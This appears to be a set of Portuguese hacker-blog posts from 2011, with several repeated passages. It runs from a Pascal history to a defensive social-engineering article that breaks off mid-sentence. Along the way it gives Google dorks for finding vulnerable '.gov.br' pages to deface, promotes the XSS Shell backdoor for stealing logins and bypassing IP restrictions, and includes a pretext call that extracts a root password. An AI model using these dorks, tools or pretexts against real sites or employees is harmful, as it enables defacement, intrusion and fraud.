Pascal originou do ALGOL, uma linguagem de programação voltada para computação científica. Em um congresso em Zurich, um comitê internacional designou o ALGOL como uma linguagem independente de plataforma. Isto deu mais liberdade para as características que eles poderiam colocar na linguagem, mas também tornou mais difícil a escrita de compiladores para ela. Muitos fabricantes de computador não fizeram compiladores. A carência de compiladores em muitas plataformas, combinada com sua carência de ponteiros e muitos tipos de dados básicos tais como caracteres, fez com que ALGOL não fosse amplamente aceito. Cientistase e engenheiros migraram para o FORTRAN, uma linguagem de programação que estava disponível em muitas plataformas. O ALGOL acabou quase totalmente abandonado exceto como uma linguagem para a descrição de algoritmos.
Wirth Inventa o Pascal
Nos anos 60, muitos cientistas da computação trabalharam na extenção do ALGOL. Um desses cientisas era o Dr. Niklaus Wirth do Swiss Federal Institute of Technology (Zurich), um membro do grupo original que criou o ALGOL. Em 1971, ele publicou sua especificação para uma linguagem altamente estruturada que lembrava o ALGOL em muitos pontos. Ele a chamou de Pascal em homenagem ao filósofo e matemático frances do século 17 que construiu um computador mecânico-digital funcional.
Pascal é bastante orientado a dados, dando ao programador a capacidade de definir tipos de dados personalizados. Com esta liberdade veio a rígida checagem de tipos, que garantiu que tipos não se misturariam. Pascal pretendia ser ser uma linguagem educacional, e foi amplamente adotada como tal. Pascal é de escrita mais livre, diferente de FORTRAN, assim os estudantes não tinham que se preocupar com formatação. Além disso, Pascal se parece muito com uma linguagem natural, tornando muito fácil o entendimento do código escrito com ele.
Uma das coisas que matou o ALGOL foi a dificuldade de se criar um compilador para ele. Wirth evitou isso fazendo com que seu compilador Pascal compilasse para um código objeto intermediário, independente de plataforma. Um outro programa transformava esse código intermediário em código executável. O Prof. Ken Bowles da Universidade da Califórinia em San Diego (UCSD) agarrou a oportunidade que isto oferecia para adaptar o compilador Pascal para o Apple II, o microcomputador mais popular da época. O USCD P-System tornou-se um padrão, e foi amplamente usado em universidades. Isto foi possível também pelo baixo cusot do Apple II comparado aos mainframes, que eram necessários na hora de executar outras linguagens tais como FORTRAN.
Pascal Torna-se Padrão
Por volta dos anos 80, Pascal já tinha se tornado amplamente aceito em universidades. Duas coisas aconteceram para torná-lo mais popular.
Primeiro, o Educational Testing Service, a companhia que escreve e administra o principal exame de admição em universidades (semelhante ao vestibular) dos Estados Unidos, decidiu adicionar um exame de Ciência da Computação aos seus exames de Colocação Avançada para estudantes de escolas secundárias. Para este exame, foi escolhida a linguagem Pascal. Por causa disso, os estudantes de segundo grau assim como estundantes do primário começaram a aprender Pascal. Pascal permaneceu como linguagem oficial nesses exames até 1999, quando foi substituído por C++, que deu lugar ao Java logo depois.
Segundo, uma pequena companhia chamada Borland International lançou o compilador Turbo Pascal para o IBM Personal Computer. Este compilador foi revolucionário. Ele pegou alguns atalhos e fez algumas modificações no Pascal padrão, mas essas foram poucas e mantiveram a sua maior vantagem: velocidade. O Turbo Pascal compilava a uma taxa estonteante: milhares de linhas em um minuto. Naquela época, os compiladores disponíveis para a plataforma PC eram lentos e gigantescos. Quando o Turbo Pascal apareceu, ele era um milagre. Logo, o Turbo Pascal tornou-se o padrão de fato para programação em PC. Quando revistas de computação publicavam códigos fonte para programas utilitários, eles eram geralmente ou em assembly ou em Turbo Pascal.
Ao mesmo tempo, a Apple lançou sua série de computadores Macintosh. Desde que o UCSD Pascal foi implementado pela primeira vez no Apple II, a Apple fez do Pascal a linguagem de programação padrão para o Mac. Quando os programadores receberam a API e códigos de exemplo para programação em Mac, eles eram todos em Pascal.
Extensões
Da versão 1.0 até a 7.0 do Turbo Pascal, a Borland continuou a expandir a linguagem. Uma das críticas da versão original do Pascal era a carência de compilação separada para módulos. Wirth até criou uma nova linguagem de programação, Modula-2, para resolver esse problema. A Borland adicionou isto ao Pascal através de units.
Na versão 7.0, muitas características avançadas foram adicionadas. Uma delas foi a DPMI (DOS Protected Mode Interface), uma forma de executar programas DOS em modo protegido, obtendo velocidade extra e liberdade de quegrar a barreira de 640K instituída pela Microsoft em suas primeiras versões do DOS. O Turbo Vision, um sistema com janelas, baseado em texto, permitiu aos programadores criar interfaces interessantes quase que instantaneamente. Pascal até se tornou orientado a objetos, quando a versão 5.5 adotou as extensões do Apple Object Pascal. Quando o Windows 3.0 foi lançado, a Borland criou o Turbo Pascal para Windows, unindo a velocidade e facilidades do Pascal à interface gráfica para usuários (GUI). Parecia que o futuro do Pascal estava garantido.
As Coisas Mudam
Contudo, não foi assim. Nos anos 70, Dennis Ritchie e Brian Kernighan dos Laboratórios Bell da AT&T criaram a Linguagem de Programação C. Ritchie então colaborou com Ken Thompson para desenvolver o sistema operacional UNIX. AT&T tinah, naquela época, um monopólio sobre os serviços telefônicos nos Estados Unidos, e e teve a permissão de manter aquele monopólio em troca da sua retirada do negócio de computadores. Com isso, a AT&T forneceu o sistema operacional, com código fonte, para universidades gratuitamente.
Assim, toda uma geração de estudantes de Ciência da Computação que aprendeu Pascal nos cursos de programação introdutórios, aprendia C quando eles se aprofundavam em sistemas operacionais. Lentamente, a linguagem C começou a entrar no mundo da programação de computadores.
O maior culpado, ironicamente, foi a orientação a objetos e a mudança para o Windows na plataforma PC. Bjarne Stroustrop introduziu a orientação a objetos a quase todo mundo quando ele criou o C++. Object Pascal foi criado rapidamente em resposta, mas para a maioria dos programadores, a primeira coisa que vem a mente quando programação OO é mencionada é C++.
A medida que o mundo ia na direção do Windows, o trabalho de manter-se junto a ele tornava-se maior. o Windows foi programado em C (K&R C, para ser mais específico), e a Microsoft liberou a API inteiramente em C. Codigos de exemplo vinham em C. A maioria dos programas de terceiros eram escritos em C. Programar aplicações para Windows em Pascal era nadar contra a maré.
Muitas escolas e universidades abandonaram o Pascal, escolhendo C++, ou o novo Java, para seus cursos de programação. Finalmente, o exame de colocação das universidades americanas adotou C++, acabando com o domínio do Pascal nas escolas.
Então por que aprender Pascal?
Independente de não ser mais um padrão de fato, Pascal ainda é extremamente útil. C e C++ são linguagens bastante simbólicas. Enquanto Pascal escolhe palavras (por exemplo, begin-end), C/C++ escolhe símbolos ({}). Além disso, C e C++ não são linguagens fortemente tipadas. Em Pascal, a mistura de tipos geralmente leva a um erro. Em C/C++, nada aconteceria. Você poderia até tratar ponteiros como inteiros e fazer aritmética de ponteiros com eles. Desta forma, você poderia quebrar o programa muito facilmente. Quando o exame de colocação em universidades adotou C++, apenas um subconjunto do C++ foi adotado. Muitas características, como arrays, eram consideradas muito perigosas, e o Educational Testing Service forneceu sua própria versão "segura" dessas características. Java corrigiu muitos desses problemas do C++ (não existem ponteiros reais em Java).
Uma outra razão: velocidade e tamanho. O compilador Pascal da Borland ainda é muito rápido. A Borland revitalizou o Pascal para windows com o Delphi, um ambiente RAD (Rapid-Application-Development). Em vez de gastar várias horas escrevendo uma interface para o usuário para um programa Windows em C/C++, você poderia fazer isso em dez minutos com as ferramentas de projeto gráfico do Delphi. Você poderia fazer o mesmo no Visual Basic, mas o Delphi é muito mais rápido do que o Visual Basic.
Além disso, o Pascal continua sendo a linguagem preferida em muitas universidades, parcialmente devido à complexidade de ensinar programação introdutória com Java ou C++. Ensinar Java requer o ensino de orientação a objetos - algo muito pesado para um curso de programação para iniciantes. Para ensinar programação procedura simples, Pascal continua sendo a melhor escolha.
Assim, mesmo depois do C, C++ e Java tomarem conta do mundo da programação, Pascal mantém um nicho no mercado. Muitos freeware, shareware e programas de código-aberto de pequena escala são escritos em Pascal/Delphi. Assim aproveite para aprender Pascal enquanto ele ainda resiste. É uma grande introdução à programação de computadores. Não é assustador como C, perigoso como C++, ou abstrato como Java.
Hello World
Na curta história da programação de computadores, uma tradição foi criada. O primeiro programa escrito em uma nova linguagem sempre é um programa "Hello, world". Para encerrar este artigo vamos apresentar a versão do Hello World para o Pascal. Copie e cole o seguinte programa em seu editor de texto ou IDE, então compile e execute-o:
program Hello;
begin (* Main *)
writeln ('Hello, world.')
end. (* Main *)
A saída deve ser isso:
Hello, world.
Crédito: ScriptBoy
[Dica] Dorks como usar e como fazer
Primeiramente vamos saber pra que serve as dorks =>serve pra fazer uma busca detalhada, tipo quando vc busca no google ele da vários resultados iguais e parecidos,com uma dorks você consegue filtra informações necessárias pra um deface tipo:
=> inurl:.com.br filtra um domínio que vc deseja.
=> inurl:.php?id= filtra a extensão da pagina.
=> intext:"historia" procura por aquela palavra escrita na pagina.
Como fazer uma dork?
inurl:.gov.br & inurl: .php?id= & intext: "Ladrão"
lembrado que sempre e necessário usar (&) pra ligar as dorks apesar q hj em dia mt deface nem usam mais.
Lembrando que não existe dork priv8 apenas exitem dorks menos usadas.
Créditos: Ex-hacker
=> inurl:.com.br filtra um domínio que vc deseja.
=> inurl:.php?id= filtra a extensão da pagina.
=> intext:"historia" procura por aquela palavra escrita na pagina.
Como fazer uma dork?
inurl:.gov.br & inurl: .php?id= & intext: "Ladrão"
lembrado que sempre e necessário usar (&) pra ligar as dorks apesar q hj em dia mt deface nem usam mais.
Lembrando que não existe dork priv8 apenas exitem dorks menos usadas.
Créditos: Ex-hacker
jewelofchaos.com & Corp-AntiSecH.Blogspot.com
domingo, 23 de outubro de 2011
quarta-feira, 19 de outubro de 2011
Batch Renovar o Ip
ipconfig /release
ipconfig /flusdns
ipconfig /flushdns
ipconfig /renew
Geralmente o Povo Aqui Na Empresa Reclama Muito Na Lentidão Da Rede Então Eu Uso Esse Comando Ai e Volta a Pegar Normalmente Qual Quer Coisa Posta Ai.
By: NeoInvasor
ipconfig /flusdns
ipconfig /flushdns
ipconfig /renew
Geralmente o Povo Aqui Na Empresa Reclama Muito Na Lentidão Da Rede Então Eu Uso Esse Comando Ai e Volta a Pegar Normalmente Qual Quer Coisa Posta Ai.
By: NeoInvasor
[ Download ] Apostila Basica De Pascal
Bom Galera vim trazer uma apostila de pascal pra vocês, lembrando que Pascal é a 1° linguagem que se aprende em uma faculdade, é exelente para aprender a logica da programação, porém ele é muito limitado em relação a outras linguagens.
Download : http://www.4shared.com/file/jy8PVj7p/Apostila_Pascal__1_.html
Scan : http://www.virustota...599d-1316282245
Download : http://www.4shared.com/file/jy8PVj7p/Apostila_Pascal__1_.html
Scan : http://www.virustota...599d-1316282245
domingo, 16 de outubro de 2011
Attack DDos
Em um ataque distribuído de negação de serviço (também conhecido como DDoS, um acrônimo em inglês para Distributed Denial of Service), um computador mestre (denominado "Master") pode ter sob seu comando até milhares de computadores ("Zombies" - zumbis). Neste caso, as tarefas de ataque de negação de serviço são distribuídas a um "exército" de máquinas escravizadas.
O ataque consiste em fazer com que os Zumbis (máquinas infectadas e sob comando do Mestre) se preparem para acessar um determinado recurso em um determinado servidor em uma mesma hora de uma mesma data. Passada essa fase, na determinada hora, todos os zumbis (ligados e conectados à rede) acessarão ao mesmo recurso do mesmo servidor. Como servidores web possuem um número limitado de usuários que pode atender simultaneamente ("slots"), o grande e repentino número de requisições de acesso esgota esse número de slot, fazendo com que o servidor não seja capaz de atender a mais nenhum pedido. Dependendo do recurso atacado, o servidor pode chegar a reiniciar ou até mesmo ficar travado.
Fonte: .wikimedia
E Eu Fiz Esse Video Pra Vc Poder Ter Uma Noção Melhor..
O ataque consiste em fazer com que os Zumbis (máquinas infectadas e sob comando do Mestre) se preparem para acessar um determinado recurso em um determinado servidor em uma mesma hora de uma mesma data. Passada essa fase, na determinada hora, todos os zumbis (ligados e conectados à rede) acessarão ao mesmo recurso do mesmo servidor. Como servidores web possuem um número limitado de usuários que pode atender simultaneamente ("slots"), o grande e repentino número de requisições de acesso esgota esse número de slot, fazendo com que o servidor não seja capaz de atender a mais nenhum pedido. Dependendo do recurso atacado, o servidor pode chegar a reiniciar ou até mesmo ficar travado.
Diagrama De Um Attack DDos.
Fonte: .wikimedia
E Eu Fiz Esse Video Pra Vc Poder Ter Uma Noção Melhor..
sexta-feira, 14 de outubro de 2011
XSS Shell
XSS Shell é um poderoso backdoor XSS e gerente de zumbi. Este conceito apresentado pela primeira vez pelo "XSS-Proxy - http://xss-proxy.sourceforge.net/". Normalmente em atacante ataques XSS tem um tiro, em XSS Shell você pode enviar pedidos de forma interativa e obter respostas de vítima. você pode backdoor da página.
Você pode roubar autenticação básica, você pode ignorar as restrições de IP em painéis de administração, você pode DDoS alguns sistemas com uma permanente vulnerabilidade XSS possibilidades de ataque, etc são limitados com idéias. Basicamente esta ferramenta demonstra que você pode fazer mais com XSS.
Tipos de criptografia de senhas
Tipos de criptografia de senhas
E indispensável hoje em dia identificar o tipo de criptografia.
Nesse tópico vou lista os tipos de criptografias usados em senhas:
Mais comuns
md5: aba8c5f77c63653318ac43fe1a1d54ff
md4: 67e36c3b402837bc8d9bc1c982233ad7
md2: d1c34d62fc8a2ffb68536d82cca44334
sha1: 59f86a19c4b2f8d80e5b14abc351d050dea188eb
Créditos: Bhior
sha256: a94a011d426052a7c81692f0d3f8032424d9178d419acb2fcd cea3160383f602
sha384: 6dba2d81242cc76c0ea17f3da21cb7d47439a65074fbe679dc 92394b4f5c6b954436e869248df9b60412ebee97d41fcd
sha512: 48fcd376a0eb0227a6d7bc3a28ef826f5c2bc4a62fe0fc2139 e7427ccb86851f2030e5a855b2a501b98e70f0040d59271142 6b6798cb8be110bf4dc75724cd2b
LM: 7bc213962f4bcef4f9393d97e7a1873c
NT: e6dd58312b8f14b889be39d8db2007fd
base_64: cGFuZGVtaWM
rot_13: cnaqrzvp
Menos comuns:
crc32b: 968c0941
snefru: 5369d04ab36c05e6ee996a7eb48ae8eabcc8bdcb6dac2313bf c8a2babcd7c781
gost: 3d7ef36be32f6e34d5ebbae623295f5aced68d3c6540654344 9f208ffe0ad318
adler32: 0ec70342
ripemd128: cb9c7298626eb8ee0cf512ff3e7d4037
ripemd160: 89dfb8ce8200d4eb238c7548c9757dc67160c028
tiger128,3: 3d11457e9e47411c7b233baa90d7c650
tiger128,4: c9400fdc3b6383ab8bb84404601fbfd2
tiger160,3: 3d11457e9e47411c7b233baa90d7c650f6f669d7
tiger160,4: c9400fdc3b6383ab8bb84404601fbfd23a1793de
tiger192,3: 3d11457e9e47411c7b233baa90d7c650f6f669d7f6d42787
tiger192,4: c9400fdc3b6383ab8bb84404601fbfd23a1793de7655d0f0
haval128,3: e901a382531811fe11eeca7c81d1f256
haval128,4: 78e397c109c31e65dda2300568d715fd
haval128,5: 6292bd7e504a4e487e3e3105eb92d02c
haval160,3: 3b5cfdf65ca5e7e8501e21f19a51e697ca8ddfa4
haval160,4: bf8ec2e0e1fd63e222d659cd9249a2eb7fb8f0d6
haval160,5: bb56c5fed5abf72d12b3a0efd7c031c4952e9006
haval192,3: ad73ada2cd0127771526d0d93c15894b0b9bb1affb13015e
haval192,4: 56198e71a73dbd2b4ccc5a09b584140d2e66cffef19a79d3
haval192,5: b1f209c245b3caed6238cfdfbf0967d5f53972129daf23d1
haval224,3: a1e79ed89e599dc8aeb0bb76e207751c4b760eeea363ddbc84 13805c
haval224,4: dd65527ada7c35b3ff9535851be011a93eb62e51ef3eb112a7 ab1887
haval224,5: 0516bc0064806c6ff70cff3bb06c55a3b62be3c393c3a6874c 04ae0c
haval256,3: 21cbc6fcd6adef4354aa9ef3cf639e73a63aeb50cf5b5ce93f 70863619f9d2b9
haval256,4: 7ae3cbb3b02b1f890e1c375f987a13f6ae97fa8a5e392e4f60 ec5d6b6fac1565
haval256,5: f57a10b3dbdcc95d768e6b5e3a7818505826140e27047ad8be f5c10997d234dc
whirlpool: c86c64e781718ab426b7dcd36b1468a3781cee0be35aac5957 a43408e8b15a65dfeee1499ba9b18a847f9a39d68c1dfb4dd6 82967ff67b11595ad2dcc27fdbc1
craeditos: 2SUB
Créditos: SENHINHA por Ter Postado La No Forum Da Jewel Of Chaos
E indispensável hoje em dia identificar o tipo de criptografia.
Nesse tópico vou lista os tipos de criptografias usados em senhas:
Mais comuns
md5: aba8c5f77c63653318ac43fe1a1d54ff
md4: 67e36c3b402837bc8d9bc1c982233ad7
md2: d1c34d62fc8a2ffb68536d82cca44334
sha1: 59f86a19c4b2f8d80e5b14abc351d050dea188eb
Créditos: Bhior
sha256: a94a011d426052a7c81692f0d3f8032424d9178d419acb2fcd cea3160383f602
sha384: 6dba2d81242cc76c0ea17f3da21cb7d47439a65074fbe679dc 92394b4f5c6b954436e869248df9b60412ebee97d41fcd
sha512: 48fcd376a0eb0227a6d7bc3a28ef826f5c2bc4a62fe0fc2139 e7427ccb86851f2030e5a855b2a501b98e70f0040d59271142 6b6798cb8be110bf4dc75724cd2b
LM: 7bc213962f4bcef4f9393d97e7a1873c
NT: e6dd58312b8f14b889be39d8db2007fd
base_64: cGFuZGVtaWM
rot_13: cnaqrzvp
Menos comuns:
crc32b: 968c0941
snefru: 5369d04ab36c05e6ee996a7eb48ae8eabcc8bdcb6dac2313bf c8a2babcd7c781
gost: 3d7ef36be32f6e34d5ebbae623295f5aced68d3c6540654344 9f208ffe0ad318
adler32: 0ec70342
ripemd128: cb9c7298626eb8ee0cf512ff3e7d4037
ripemd160: 89dfb8ce8200d4eb238c7548c9757dc67160c028
tiger128,3: 3d11457e9e47411c7b233baa90d7c650
tiger128,4: c9400fdc3b6383ab8bb84404601fbfd2
tiger160,3: 3d11457e9e47411c7b233baa90d7c650f6f669d7
tiger160,4: c9400fdc3b6383ab8bb84404601fbfd23a1793de
tiger192,3: 3d11457e9e47411c7b233baa90d7c650f6f669d7f6d42787
tiger192,4: c9400fdc3b6383ab8bb84404601fbfd23a1793de7655d0f0
haval128,3: e901a382531811fe11eeca7c81d1f256
haval128,4: 78e397c109c31e65dda2300568d715fd
haval128,5: 6292bd7e504a4e487e3e3105eb92d02c
haval160,3: 3b5cfdf65ca5e7e8501e21f19a51e697ca8ddfa4
haval160,4: bf8ec2e0e1fd63e222d659cd9249a2eb7fb8f0d6
haval160,5: bb56c5fed5abf72d12b3a0efd7c031c4952e9006
haval192,3: ad73ada2cd0127771526d0d93c15894b0b9bb1affb13015e
haval192,4: 56198e71a73dbd2b4ccc5a09b584140d2e66cffef19a79d3
haval192,5: b1f209c245b3caed6238cfdfbf0967d5f53972129daf23d1
haval224,3: a1e79ed89e599dc8aeb0bb76e207751c4b760eeea363ddbc84 13805c
haval224,4: dd65527ada7c35b3ff9535851be011a93eb62e51ef3eb112a7 ab1887
haval224,5: 0516bc0064806c6ff70cff3bb06c55a3b62be3c393c3a6874c 04ae0c
haval256,3: 21cbc6fcd6adef4354aa9ef3cf639e73a63aeb50cf5b5ce93f 70863619f9d2b9
haval256,4: 7ae3cbb3b02b1f890e1c375f987a13f6ae97fa8a5e392e4f60 ec5d6b6fac1565
haval256,5: f57a10b3dbdcc95d768e6b5e3a7818505826140e27047ad8be f5c10997d234dc
whirlpool: c86c64e781718ab426b7dcd36b1468a3781cee0be35aac5957 a43408e8b15a65dfeee1499ba9b18a847f9a39d68c1dfb4dd6 82967ff67b11595ad2dcc27fdbc1
craeditos: 2SUB
Créditos: SENHINHA por Ter Postado La No Forum Da Jewel Of Chaos
Evitando ataques de engenharia social
Evitando ataques de engenharia social By w4r10ck
Conteúdo Básico Para Iniciantes
Peguei essa materia em um antigo blog que eu tinha (Nen lembro se foi eu mesmo que escrevi ou não) mas de qualquer forma eu estou disponibilizando para vocês, afinal engenharia social é o 1ºPasso para um iniciante! :Laughing:
Como evitar ataques de engenharia social?
O fator humano é uma das maiores causas de invasões e ataques na rede, seja por uma senha fraca ou pelo esquecimento de algum cuidado básico de segurança. Por isso devemos voltar nossa atenção para os "ataques" de engenharia social, que muita vezes podem dar acesso root para um cracker em menos de 10 minutos, dependendo da habilidade do mesmo. Um ataque de engenharia social é muito mais popular do que se pensa, uma vez que, se bem aplicado, é praticamente indetectável. Vamos abordar algumas etapas de um "ataque" de engenharia social como exemplo e também como evoluir o fator humano para que não caia nesse golpe. A informação está na rede. Tudo que um "engenheiro social" precisa é de informações sobre a empresa que pretende atacar. Onde encontrá-las ? Na própria internet. Uma simples visita ao site da empresa pode revelar detalhes interessantes como : empresa que produziu o site (usarei o nome ficticio XXX para me referir a esta empresa), programas que são usados no site (bancos de dados,sistema operacional,etc...), empresas parceiras, etc. De posse dessas informações fica bastante fácil planejar um golpe de "people spoofing" (termo interessante, não ?). O invasor pode ainda usar uma ferramenta de varredura de redes e descobrir que o sistema operacional é, por exemplo, um OpenBSD "nao-exploravel" com a porta 22 aberta (referente ao sshd para conexao remota), agora só é preciso uma senha. De posse desses dados um cracker pode passar a mão no seu telefone e colher mais detalhes para finalmente lançar-se em direção ao alvo. Assim o cracker liga para a empresa que fez o site da empresa alvo para descobrir jargões e nomes que poderá utilizar na sua investida. Passando-se por um cliente como qualquer outro ele pode adquirir o nome de funcionários da area técnica que eventualmente poderá usar para se "relacionar" com a empresa alvo, ele também cita o nome da empresa alvo dizendo que viu o logo da XXX no site dela e pergunta "inocentemente" detalhes sobre o serviço prestado para o alvo dessa forma consegue descobrir que eles possuem um servidor interno com um serviço de IP direto e um link de 1 Mb/s além de um __contrato de manutenção do site__. Manipulando a informação para o ataque De posse de tantos detalhes fica bastante fácil tramar um pequena história para envolver um funcionário inocente. Supondo que o "people spoofer" tenha descoberto que o funcionário responsável pela manutenção das páginas criadas pela empresa XXX seja o Fulano, ele liga para a empresa alvo passando-se por Fulano. Um possível diálogo poderia ser : Atendente : Empresa alvo. Boa Tarde. Cracker[Fulano] : Boa tarde. Eu sou Fulano da empresa XXX, nós criamos o site de vocês e eu preciso fazer uma manutenção na página, você pode me passar para o setor de informática? /* OBS.: Neste ponto não há o que fazer, a atendente simplesmente redireciona a chamada. A seguir veja onde está o problema.*/ Funcionário CPD : CPD. Boa tarde. Cracker[Fulano] : Boa tarde. Aqui é o Fulano, eu sou da Empresa XXX e não consegui me logar no servidor de vocês para ajustar alguns links. Vocês mudaram a senha do root ? /* Falando com profissional da área técnica, o Cracker já utiliza jargões comuns a todos nós. Como o Cracker havia ligado para a empresa XXX, que fez o site, ele já sabe como eles lidam com os clientes e também como falam ao se referirem a mesma coisa, como usar site,homepage,página,website,etc... */ Funcionário CPD : Hmmm...Até onde eu sei não foi mudado nada. Cracker[Fulano] : Estranho...A senha não é Bc07dp12 ? /* Neste ponto o funcionário já acretida estar falando com um funcioário da empresa XXX */ Funcionário CPD : Não, a senha é S3rvid0r. Com 'S' maiusculo. //Senha fraca por sinal O cracker conversa durante mais algum tempo para não gerar desconfiança e se despede agradecendo a colaboração. É claro que este diálogo normalmente é mais longo, porém de posse da informação correta o desfecho é quase sempre o mesmo. Tempo depois o site da empresa é invadido e tem a página principal totalmente desfigurada. Não se pode detectar a origem porque os logs foram todos apagados e ninguém sabe como aconteceu o ataque e também não se lembram que a senha foi passada por telefone para o suposto funcionário da empresa XXX. Vale lembrar que um ataque de engenharia social NÃO tem como objetivo principal simplesmente invadir um site e sim adquirir outros dados muito mais relevantes que poderiam inclusive serem vendidos para competidores. É possível inventar ataques desse tipo até onde a imaginação humana possa alcançar, caraterizando assim um golpe potencialmente perigoso. A única maneira de evitar esses ataques é implantar uma politica de segurança que tenha abrangencia sobre todos os setores da empresa. Gerenciando o fator humano. Neste exemplo acima tudo começou com uma visita ao site da empresa onde o Craker colheu varios dados iportantes sobre ela. O ponto fraco de um ataque de engenharia social não esta aqui. Não é preciso,nem recomendado, retirar os dados do site(removendo o logos powered by... ou design by...), o ponto fraco do exemplo acima se encontra no funcionário do CPD que passou a senha do superusuário por telefone para alguém que ele não teria como saber com certeza se era realmente quem dizia ser. Para evitar essa situação é preciso que seja implantada um politica de segurança dentro da empresa. 1 ) Senhas por telefone são muito perigosas. É muito mais seguro fazer isso por e-mail, o funcionário do CPD devia ter dito que "devido a uma politica de segurança eu não posso lhe passar a senha por telefone mas estarei enviando a senha para root@XXX.com.br...". Desta forma garante-se que a senha chegará em um lugar supostamente seguro, onde o suposto funcionário poderia,caso realmente fosse funcionário da empresa XXX, acessar facilmente. 2 ) Ética ao falar sobre outro cliente em específico. Os funcionários nunca devem passar detalhes de seus clientes para outros supostos clientes, isso representa um perigo já que a informação é tudo neste caso. Deve-se educar os funcionários para sempre falarem de maneira genérica. Este segundo item se aplica a empresa XXX que fez o site da empresa alvo e acabou revelando detalhes vitais para o Cracker. OBS.: NUNCA passar senhas por telefone, sempre usar e-mail ou pessoalmente. Caso estes dois passos acima fossem seguidos uma invasão seria evitada. Provedores de acesso a internet e empresas de telefonia também devem adotar politicas de segurança como esta porém com mais alguns itens. Quando um usuário liga dizendo que perdeu seu nome de usuário ou senha(ou ainda que gostaria de alguma outra informação referente a sua conta, resultado parcial da conta do celular por exemplo) a atendende além de solicitar o nome da pessoa deve pedir educadamente para "verificar se os dados da pessoa estão atualizados", dessa forma são solicitados os dados e conferidos com os dados constantes no cadastro. Caso os dados mais relevantes como nome completo,data de nascimento,RG,CPF sejam iguais ao do referente cadastro, poderá ser fornecida a informação solicitada para o cliente. Porém, mesmo fazendo todas essas verificações não é possível ter certeza de que a pessoa é realmente quem afirma ser( um cracker pode ter conseguido essas informações de alguma forma, revirando o lixo por exemplo ). Infelizmente esse processo pode se tornar cansativo e chatear um cliente que realmente perdeu seu nome de usuário ou senha, porém este processo é vital para se manter o minímo de segurança. Podemos ainda sugerir que na hora do cadastro seja solicitado ao cliente que estabeleça uma pergunta que ele deseja responder em situações como essas, assim ficam armazenados no cadastro a pergunta e resposta esperada, por exemplo : O cliente fez seu cadastro por telefone e após serem cadastrados todos os dados a antendente explica os motivos pelo qual é feito isso e pede para que o cliente recém cadastrado diga uma pergunta (que lhe será feita em casos de solicitação de dados sigilosos, senha, usuário, etc..) e uma resposta que também ficará armazenada no cadastro. Assim, o cliente quando for solicitar sua senha deve responder a pergunta : Atendente pergunta: Qual o nome de seu animal de estimação ? Cliente responde : Thunder. Caso a resposta seja correta a atendente poderá fornecer a informação para o cliente. É importante que a pergunta seja de cunho mais pessoal possível e que não se sobreponha a nenhum dos outros dados como "Qual minha data de nascimento ?". A atendente que cadastrar o cliente deve evitar que perguntas como essas sejam utilizadas. Muitas vezes é muito mais confortável para o cliente responder o CPF ou RG e a pergunta do que todos os dados do seu cadastro. Cadastros e formulários de recuperação de senhas pela internet devem seguir o mesmo padrão. Grande parte das empresas de telefonia fixa e celular exigem apenas o CPF para fornecerem dados como resultado parcial da conta ou solicitar algum novo serviço. Juntamente com os cuidados acima é recomendado usar em conjunto um serviço de indentificação de chamada ( BINA ), desta forma basta a pessoa que está fazendo o atendimento peguntar o telefone de onde o suposto cliente está ligando para posterior contato. Caso o telefone fornecido pelo suposto cliente e o constante no indentificador de chamada não sejam os mesmos, já pode-se descofiar de algo. O Lixo Tudo que é jogado no lixo de uma empresa pode ser aproveitado para a criação de um ataque de engenharia social. Basta criar situações em cima daqueles dados e pronto, por isso nunca jogar de forma aproveitável o seguintes itens : * Cadernetas com telefones; * Memorandos; * Manuais com politícas internas da empresa; * Calendários com informações sobre eventos, cursos ou férias; * Manuais dos Sistemas utilizados; * Qualquer coisa que contenha nome de usuários e senhas; (óbvio, mas acontece) * Disquetes,CDs ou HDs aparentemente inutilizáveis; * Papel timbrado da empresa. Sempre que algum destes itens forem jogados fora devem ser completamente inutilizados(picados, furados, queimados, etc). O caso Kevin Mitnick É impossível escrever um documento sobre engenharia social sem citar Kevin David Mitnick( também conhecido como Condor,N6NHG,Anton Chernoff,Fred Weiner,Lee Nussbaum,Brian Merrill,Tom Bodette e muitos outros nomes que usou em sua fase cracker/phreaker/engenheiro social ). Kevin obtinha sucesso na grande maioria dos ataques devido o fato de ser um sujeito com uma voz carismática ao telefone, fato este importatissímo para que as pessoas colaborassem. Ele treinava consigo mesmo seus ataques. Kevin costumava dizer "...eu pratico antes até me convencer de que a história que estou representando é real e acreditar nela..." . Mitnick não tinha muito critério para escolher seu alvo, apenas pensava "e se a pessoa do outro lado cair nessa história?", então pegava o telefone e executava seu "ataque". Ele conseguiu muito sucesso em suas investidas com uma simples simulação de um funcionário do Seguro Social americano. Veja o exemplo deste diálogo para ter uma ideia da facilidade de se conseguir a informação desejada : -- Alô, aqui é Tom Bodette, da Administração da Seguridade Social. Eu gostaria de saber se vocês podem me ajudar com um problema que estamos tentando esclarecer. -- Posso tentar. -- Nossos registros aqui parecem estar meio confusos. Achamos que as informações sobre seus parentes podem estar trocadas. Vejamos...O senhor conhece Mary Eberle ? -- É minha irmã. -- Sua irmã ? Então, quem é Joseph Wernle ? Mary por acaso tem um filho chamado Joseph Wernle ? -- Não, o filho dela se chama Joe Ways. -- Ele mora na Pensilvânia ? -- Não, no Sul da Califórnia. É agente do FBI. -- Sinto muito, então. Devo ter querido falar com Wernle errado... Com este simples telefonema Mitnick conseguiu mais informações sobre os agentes do FBI envolvidos no seu caso. Nesse diálogo podemos ver a dificuldade ou até mesmo a impossibilidade de evitar um ataque de engeharia social. A pessoa do outro lado da linha não teria o que argumentar caso não quisesse colaborar. Ataques de engeharia social para pessoas comuns tendem a ter um resultado muito mais satisfatório do que para empresas. Utilizando o mesmo nome ( Tom Bodette ) Kevin conseguiu descobrir telefones grampeados pela Pac Bell. Ele simplesmente ligou para o Centro de Controle e Comutação da Bell se passando por um funcionário da Bell e disse que precisava desligar o grampo para fazer uma manutenção e depois, ao pedir o número para ligar o grampo, descobria o telefone grampeado . Empresas de telefonia nas quais os funcionários se comunicam muito por telefone ou rádio devem criar um método para indentificação dos funcionários(código e senha). Caso algum técnico ligue para a central solicitando alguma informação deve ser checado seu código e senha no sistema da central e, caso estejam corretos, será feita uma verificação para assegurar que este funcionário pode ter acesso à informação solicitada. Acredito ter conseguido mostrar com esse documento uma pequena parte do mundo da engenharia social, um golpe que nunca deixou de existir e que pode passar facilmente por qualquer firewall do mundo. Vale lembrar que quem pratica engenharia social pode ser enquadrado no crime de falsidade ideológica com pena prevista de 1 (um) a 3 (três) anos de reclusão em regime fechado, portanto não devemos praticar engeharia social "apenas para testar". Também posso dizer que um "people spoofer" raramente é capturado, ao menos que a 